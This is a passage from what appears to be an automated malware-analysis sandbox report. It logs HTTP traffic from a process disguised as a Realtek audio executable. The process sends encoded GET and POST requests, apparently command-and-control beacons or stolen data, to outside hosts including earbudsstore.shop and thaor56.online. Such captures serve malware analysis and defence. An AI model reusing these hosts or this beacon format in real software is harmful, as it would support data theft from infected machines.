                                                                                  Data Ascii: IUY=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07jg8XgO6Eepwr+FLHzRh0DWz2cZVlh0MX6HGq0rQUqXfUf5yWrBPaXBNJXDVQQZSmNB4KMkx6pf2wQcNZFoq5/BktPZJNYbnnvznktbUuDg1XKoXdAi632cXi8pZVWLo8+0KnI2OkB3Pe6Pi4MhlsyXDYWN/klAihHdoOG/akMI7UptJQmyv28FoU0NP9pF39KYjyA6wB7amhuT17llMVXZ4AACT0hkAoGGFe5APTz5vGvMqF7LzW1vSFFpG932vZplVIr6+wbmCMYOwlUCdLPOX1HqxlQjgquXsc/Gl3fZgGbbgFcHAYylA6rzE9Qr8YGnFGRZ7IK+KKnMB7ZBBdhRq8SpS4NM81NtalQFs8ZCxpjrxjaNQhlTS2RKXBMN3gwr5hzINGI0/XjFAt3UnTvDPCsx8l2dztRBAfj65+ztnU1W84zj7pOZn6jOF1MVM0p/m/ivVXeasxynTCkr+wbxUWSfWvr5TP4s3OEI0GPQh0qcu+x9fgN4ANqMZ0Cxd4AA0FbsP/7ikG/TwfgjjyM1jUcDiZCW1p/oKMu9uSUcKbgucdSfz2IsIxsE5tgfeZN0mxC9twb+xpRWqoMVgo3k6PSJd5dJvhpy2jDw9EHFY3mbDrpRroUgAWlr7mZrMWyJTYK1M7L4cAZP25i9DuYmAnPLV3mS7+sw6By86KA0HmcNPnBNvHSHEeuloYSGrf6jiZKADJRinVGl7bICmyYJ3wzVuDroOe6XnCGROinvkXZ+og55VrnM5zctNdaDX1KkAnduQRjQLpjElOp9j+gKiqPuLbOfBy5fxBCZiIF4HQz9431S983jYLxQniE8HtsFrWwlk0AWs3k4gi2OpYuSxtBf9v0Yu3KbaeirH9q+azze9wKBFZD1D3sdT4+V9wXm7le1Lw8vmgwdA4RnPf1Buafe1M4yMC690idXaiQP+uXNfc/i4ueC4fYra7z9u1QRan6M [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:53.697129011 CET5351OUTData Raw: 47 6b 45 4a 57 37 47 55 66 48 4a 53 5a 6c 62 69 73 55 44 72 35 71 36 49 42 2f 46 32 6a 59 72 70 36 32 43 42 4c 33 4b 50 75 38 65 35 66 64 37 36 6d 48 38 68 4d 68 30 69 4c 4c 43 71 6e 66 47 58 6a 62 32 30 67 6c 34 72 46 69 53 34 41 52 78 71 4a 79
                                                                                  Data Ascii: GkEJW7GUfHJSZlbisUDr5q6IB/F2jYrp62CBL3KPu8e5fd76mH8hMh0iLLCqnfGXjb20gl4rFiS4ARxqJy/VsG0MijQDGSJImN3kw8GIOzSn2Wr6OotXkdjfNTvruM/P4MM/gRkMmtbhJE3+4gGx4NndwAos8gGhBOHWLPRb/i0xStJuc42t2uFdA9vJC8ipeXEZhfBj1I4AJSoiEHQB8zVTT63asqPXGOxsgQwgla7eiIhnwDA
                                                                                  Dec 4, 2024 17:11:54.068998098 CET1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1251
                                                                                  date: Wed, 04 Dec 2024 16:11:53 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:54.069005966 CET181INData Raw: 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73
                                                                                  Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.11.2049726202.92.5.23807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:11:56.600965023 CET490OUTGET /cboa/?IUY=af1TSyH9ZKWDWOLhq+2G7N4mtZVzPtI6MbDiaGUzr5LnkxoPx276h73cE37euV2f02htPG9gF0GAKqxhPgTdcj/L3zWCPcCWIrrHTA4XRmlAzoY0158k8yU=&h7i-=tZtx HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.thaor56.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:11:56.970743895 CET1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1251
                                                                                  date: Wed, 04 Dec 2024 16:11:56 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:56.970796108 CET181INData Raw: 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73
                                                                                  Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.11.2049727194.195.220.41807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:02.352010965 CET769OUTPOST /0gis/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.earbudsstore.shop
                                                                                  Origin: http://www.earbudsstore.shop
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.earbudsstore.shop/0gis/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 5a 71 54 36 57 38 75 78 30 44 48 39 7a 32 46 76 6c 38 4f 45 76 54 64 75 45 46 6a 42 32 4d 7a 2f 47 6e 6b 4c 52 6e 35 58 35 32 68 4b 67 4c 38 56 65 53 4d 31 36 49 49 6d 4e 6c 62 42 59 33 6d 59 6f 55 5a 4d 6c 65 65 57 56 45 62 4f 57 48 38 2b 51 4e 5a 69 39 41 34 73 53 34 57 54 4e 34 30 7a 51 78 67 64 58 78 32 54 50 58 4b 54 49 69 65 32 46 66 6c 6e 2b 49 35 68 66 41 4b 69 67 42 2b 69 43 77 41 33 34 6f 4b 6c 45 42 67 35 72 52 36 62 68 49 67 69 58 7a 4c 44 76 34 41 33 76 49 67 55 62 78 45 47 6c 77 63 6c 4d 34 77 32 45 44 6b 47 34 57 30 42 44 67 3d 3d
                                                                                  Data Ascii: IUY=XOD8jI/m6V/6ZqT6W8ux0DH9z2Fvl8OEvTduEFjB2Mz/GnkLRn5X52hKgL8VeSM16IImNlbBY3mYoUZMleeWVEbOWH8+QNZi9A4sS4WTN40zQxgdXx2TPXKTIie2Ffln+I5hfAKigB+iCwA34oKlEBg5rR6bhIgiXzLDv4A3vIgUbxEGlwclM4w2EDkG4W0BDg==
                                                                                  Dec 4, 2024 17:12:02.504995108 CET875INHTTP/1.1 200 OK
                                                                                  Server: openresty/1.13.6.1
                                                                                  Date: Wed, 04 Dec 2024 16:12:02 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 4b 73 da 30 10 80 ef f9 15 ae 0f 99 76 a6 e0 57 52 a0 b1 d3 21 24 38 66 4c c8 24 04 6c 5f 32 b2 a4 20 11 59 72 6c 19 63 3a fd ef 35 26 0d 74 e8 a5 3a 58 da 5d ed eb 93 2c fb d3 f5 64 30 0d ef 6f 14 22 13 76 79 62 6f 27 85 01 be 70 54 cc d5 cb 13 a5 1e 36 c1 00 ed 96 8d 98 60 09 14 48 40 96 63 e9 a8 4f d3 61 ab fb be 73 6f 26 52 a6 2d fc 56 d0 95 a3 ae 5b 05 68 41 91 a4 40 d2 98 61 55 81 82 4b cc 6b 5f ef c6 c1 68 81 8f bc 39 48 b0 a3 ae 28 2e 53 91 c9 03 87 92 22 49 1c 84 57 14 e2 56 23 7c 55 28 a7 92 02 d6 ca 21 60 d8 31 da fa 61 38 49 25 c3 97 b6 b6 9b 9b 76 9a 22 b9 c8 61 46 53 b9 6f eb df b5 67 f8 25 c3 39 39 28 41 bf 28 32 e6 6c fb fb ae 69 65 59 76 f4 36 06 59 5c a0 3c 97 22 c3 ed 9c 88 54 53 15 6d 1f d9 d6 8e b3 d9 0d c4 43 4a c7 99 ce ff 2b 93 ad ed 8f c9 8e 05 aa 14 c1 99 00 c8 51 91 78 de 2d 3f 7f 39 44 b3 03 a0 c8 2a ad 59 4b bc 96 da 12 ac c0 4e 7b b0 6f cb e5 a5 e0 50 52 c1 95 83 50 ca cf 0f 9a db 2d db 51 52 8e 44 d9 96 22 6d 33 01 eb [TRUNCATED]
                                                                                  Data Ascii: 2abKs0vWR!$8fL$l_2 Yrlc:5&t:X],d0o"vybo'pT6`H@cOaso&R-V[hA@aUKk_h9H(.S"IWV#|U(!`1a8I%v"aFSog%99(A(2lieYv6Y\<"TSmCJ+Qx-?9D*YKN{oPRP-QRD"m3MGQK_"ue^"Xev;ug [FL^ Sa0ya2K` F>]!Y~2#0*z<W[y\xp=DeWee<ynk;,NCsy-"k:C=JXLs|s07Hd>ETo~%:prqB8Albp9~7+/yxU63ZNv6w>1y\w.7[^g7m0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.11.2049728194.195.220.41807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:05.037643909 CET789OUTPOST /0gis/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.earbudsstore.shop
                                                                                  Origin: http://www.earbudsstore.shop
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.earbudsstore.shop/0gis/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 6a 2f 47 43 41 4c 4c 6d 35 58 36 32 68 4b 76 72 38 63 61 53 4d 75 36 49 45 55 4e 6e 50 42 59 33 69 59 6f 56 70 4d 6d 76 65 58 48 6b 62 41 65 6e 38 38 55 4e 5a 69 39 41 34 73 53 37 71 35 4e 34 63 7a 54 42 51 64 57 56 69 55 4a 6e 4b 51 42 43 65 32 42 66 6c 6a 2b 49 34 45 66 45 4c 46 67 45 69 69 43 78 51 33 35 36 79 6d 4e 42 67 2f 76 52 37 6c 73 6f 38 76 62 42 37 4b 6e 70 30 77 32 59 4d 37 58 48 4a 63 34 43 6f 42 50 72 73 45 41 7a 64 75 36 55 31 61 65 71 4c 56 6f 33 38 69 33 71 54 7a 6f 37 48 58 48 55 76 62 47 7a 67 3d
                                                                                  Data Ascii: IUY=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zj/GCALLm5X62hKvr8caSMu6IEUNnPBY3iYoVpMmveXHkbAen88UNZi9A4sS7q5N4czTBQdWViUJnKQBCe2Bflj+I4EfELFgEiiCxQ356ymNBg/vR7lso8vbB7Knp0w2YM7XHJc4CoBPrsEAzdu6U1aeqLVo38i3qTzo7HXHUvbGzg=
                                                                                  Dec 4, 2024 17:12:05.190957069 CET875INHTTP/1.1 200 OK
                                                                                  Server: openresty/1.13.6.1
                                                                                  Date: Wed, 04 Dec 2024 16:12:05 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab 20 d4 aa 5b e8 8e bd 68 71 b0 76 aa 55 e0 a5 13 92 d4 c4 86 84 42 00 71 67 ff fb 22 76 ab 3b f6 65 f3 40 72 ce c9 b9 7d 09 b1 be dc 4c ae 67 fe c3 ad 42 64 c4 2e 4f ac ed a4 30 c0 97 b6 8a b9 7a 79 a2 54 c3 22 18 a0 dd b2 16 23 2c 81 02 09 48 52 2c 6d f5 69 36 68 74 df 77 ee cd 44 ca b8 81 df 32 9a db ea ba 91 81 06 14 51 0c 24 0d 19 56 15 28 b8 c4 bc f2 75 6e 6d 8c 96 f8 c8 9b 83 08 db 6a 4e 71 11 8b 44 1e 38 14 14 49 62 23 9c 53 88 1b b5 f0 5d a1 9c 4a 0a 58 23 85 80 61 bb d5 d4 0f c3 49 2a 19 be b4 b4 dd 5c b7 53 17 c9 45 0a 13 1a cb 7d 5b 9f d7 9e e0 97 04 a7 e4 a0 04 fd 22 4b 98 bd ed ef 87 a6 15 45 d1 d1 9b 18 24 61 86 d2 54 8a 04 37 53 22 62 4d 55 b4 7d 64 4b 3b ce 66 d5 10 0f 29 1d 67 6a ff 57 26 4b db 1f 93 15 0a 54 2a 82 33 01 90 ad 22 f1 bc 5b 7e fd 76 88 66 07 40 91 65 5c b1 96 78 2d b5 15 c8 c1 4e 7b b0 6f cb e5 25 e3 50 52 c1 95 83 50 ca af 0f 9a db 2d db 51 50 8e 44 d1 94 22 6e 32 01 ab d3 [TRUNCATED]
                                                                                  Data Ascii: 2ab[s0+X:3 [hqvUBqg"v;e@r}LgBd.O0zyT"#,HR,mi6htwD2Q$V(unmjNqD8Ib#S]JX#aI*\SE}["KE$aT7S"bMU}dK;f)gjW&KT*3"[~vf@e\x-N{o%PRP-QPD"n2I[Q>/isUZ}"1Mvv9um{*$3HQFtB\q{7tka4o F=L7Z{e0moWZ,hyk=DE{WE8d+{C,Za+uoteIdx#~6p1GP"w@5y?egzG9x_7#&WwXs@(q,KtG?gN2XbW~`5o3xRrpV/?$K;,m{AF?$0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.11.2049729194.195.220.41807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:07.724567890 CET2578OUTPOST /0gis/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.earbudsstore.shop
                                                                                  Origin: http://www.earbudsstore.shop
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 7368
                                                                                  Connection: close
                                                                                  Referer: http://www.earbudsstore.shop/0gis/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 72 2f 47 78 34 4c 52 42 74 58 37 32 68 4b 6d 4c 38 52 61 53 4e 32 36 49 4d 51 4e 6e 44 37 59 31 4b 59 6f 33 52 4d 6a 64 32 58 65 55 62 41 53 48 38 2f 51 4e 59 6d 39 41 49 6f 53 34 53 35 4e 34 63 7a 54 48 55 64 41 78 32 55 53 6e 4b 54 49 69 65 36 46 66 6c 48 2b 49 67 79 66 45 50 2f 67 33 36 69 44 52 67 33 36 4a 4b 6d 50 68 67 39 6a 78 37 74 73 6f 78 76 62 42 6d 31 6e 71 6f 61 32 62 73 37 48 44 73 71 6f 58 49 66 61 61 45 5a 49 78 51 55 77 47 6c 6c 5a 72 37 76 6c 6b 49 50 33 4e 33 46 72 4a 4f 57 44 52 75 66 61 7a 6e 6a 49 77 6d 69 35 35 55 44 51 47 68 4c 31 6e 4f 71 79 49 53 58 6e 55 4a 54 54 74 2b 35 79 75 76 79 78 75 69 71 63 43 6b 67 4a 52 58 2f 49 61 65 55 30 4a 62 49 68 5a 2b 57 65 7a 46 62 72 6d 39 42 4e 31 4b 31 74 46 46 77 49 75 4b 4d 77 61 48 6a 65 31 47 59 35 4d 6f 6c 50 38 67 4b 44 4f 68 74 41 62 75 56 6a 72 7a 6d 76 6d 65 4a 41 4d 53 4a 64 48 65 78 42 77 [TRUNCATED]
                                                                                  Data Ascii: IUY=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zr/Gx4LRBtX72hKmL8RaSN26IMQNnD7Y1KYo3RMjd2XeUbASH8/QNYm9AIoS4S5N4czTHUdAx2USnKTIie6FflH+IgyfEP/g36iDRg36JKmPhg9jx7tsoxvbBm1nqoa2bs7HDsqoXIfaaEZIxQUwGllZr7vlkIP3N3FrJOWDRufaznjIwmi55UDQGhL1nOqyISXnUJTTt+5yuvyxuiqcCkgJRX/IaeU0JbIhZ+WezFbrm9BN1K1tFFwIuKMwaHje1GY5MolP8gKDOhtAbuVjrzmvmeJAMSJdHexBwHw+IVuJZkUSB1xpQMnBJzRSDi3TMspM/gchBNnM9xHe7nTt1NgWJIz9dmhbaRtfkX68Wi5gPNwg6IEUo6ABCnQXJbGY8pjiJJxxydn5Wkjs3UvUxoigf63xJqJmHLIB4B63y6MzakmXi8N6j26GzS7yKrvvxVjk86+OOLassjEeAVDZsKPjFeyOv6po7oB2WBfZZcrT2xLBGSE61g1cCOuM/RgCTjcwyAAngzw6fRppc7/Z9V6DhfZh3Y8J9J98E2F+frI2IpyDgm+Lq5RfnoHTa9wiqU2DKcskpfpWDI8sP8Ke4pl9mc7AcjBIFGKfiw0tm2Korf7JVovtSJiSuTVFadUQWd57Uvt5eqBoccqOXxwvz6hfQOf/j/knlMhI6gOO/lLQpi09O/SLTKCbTGZaMVeld+FviPxWtRhCbQ2yvworEZURikkSUxL5X0o6s1FyPeBwuDRLDAbSLRs0aY1YXLv8Rp/p2l6wO2k19g2b7yO5PyChwl7MhC619+puKpsJQHYUp8f3e7Exk1NAgiktq9TXUtqhAuZrLVqYyb5Ht5nHgSAvORK5S+nBqt8Nc5YYCjE2F5PBOCy+54+Ryo3+reQa2IgyIyhmtmQpFF/HonF2kv3Cc+kWYFdfu8FUDeQgxitFWmyZvPU2bZkCjWaIXOGrF9mppko [TRUNCATED]
                                                                                  Dec 4, 2024 17:12:07.724596024 CET3867OUTData Raw: 48 68 4b 73 4c 4b 38 35 65 66 70 50 46 2f 6e 43 62 79 6e 63 77 36 65 54 50 69 79 45 68 59 34 73 44 75 48 6f 6c 71 4a 6a 33 68 52 71 57 65 37 32 5a 45 33 64 54 39 77 49 57 64 76 72 32 42 37 4b 6b 63 6e 52 53 59 6d 4b 49 30 6b 59 38 2b 47 75 6f 4b
                                                                                  Data Ascii: HhKsLK85efpPF/nCbyncw6eTPiyEhY4sDuHolqJj3hRqWe72ZE3dT9wIWdvr2B7KkcnRSYmKI0kY8+GuoKQC1xYKmyQL5K/BZxvGtF5lOuOoE439eUcOByPPMrN+k1OKmur0BXqI4WDQTYVRbKLVaXdy2iRJTcF5C+ojofqovwUGL1xy0/yFNBRqqLCWG92fXlcwEa7lGN0B10n19ARNdPPvU8sD+8o8WmaXBsuGw0qeolOOIXO
                                                                                  Dec 4, 2024 17:12:07.724669933 CET1493OUTData Raw: 39 70 53 58 78 6e 63 2f 73 6d 5a 71 66 37 35 76 6d 77 7a 51 49 67 41 63 71 39 50 70 63 4c 69 4f 2b 52 72 36 44 4d 46 69 57 2b 6a 35 4e 62 47 36 6a 75 4c 59 30 4a 66 47 48 58 52 37 7a 78 2b 51 6f 42 4a 41 42 45 4b 79 6d 4f 4a 7a 76 6e 67 64 75 46
                                                                                  Data Ascii: 9pSXxnc/smZqf75vmwzQIgAcq9PpcLiO+Rr6DMFiW+j5NbG6juLY0JfGHXR7zx+QoBJABEKymOJzvngduFaxoq8zHZZ53jdH/r3aNpPx9d/8HOKTn/PYO0hxyUIjPzmTxfmBNpYLqinJOW3tPcNrTdT5RVXypkUEjepXKrSwbZNmYPt5uMkSV/rnLfIr5pgW6tLX2hWGeNDXr1aEVKB7X/H/i6uuGxNcMUpRxq/gVCfAFwaG9Pz
                                                                                  Dec 4, 2024 17:12:07.878447056 CET200INHTTP/1.1 200 OK
                                                                                  Server: openresty/1.13.6.1
                                                                                  Date: Wed, 04 Dec 2024 16:12:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                  Data Ascii: f


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.11.2049730194.195.220.41807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:10.412533998 CET493OUTGET /0gis/?h7i-=tZtx&IUY=aMrcg/vn2G/nVrncRMm9sg/9wEZLpPTCuDhUOTj2ocWrQXkoPHFbln5FmLoTaWY74KRoWkXSZUSbj2dC1qWbeU//egp4ZoVrxwEcZqidFa5edjFbZGfsKVU= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.earbudsstore.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:12:10.565473080 CET1289INHTTP/1.1 200 OK
                                                                                  Server: openresty/1.13.6.1
                                                                                  Date: Wed, 04 Dec 2024 16:12:10 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
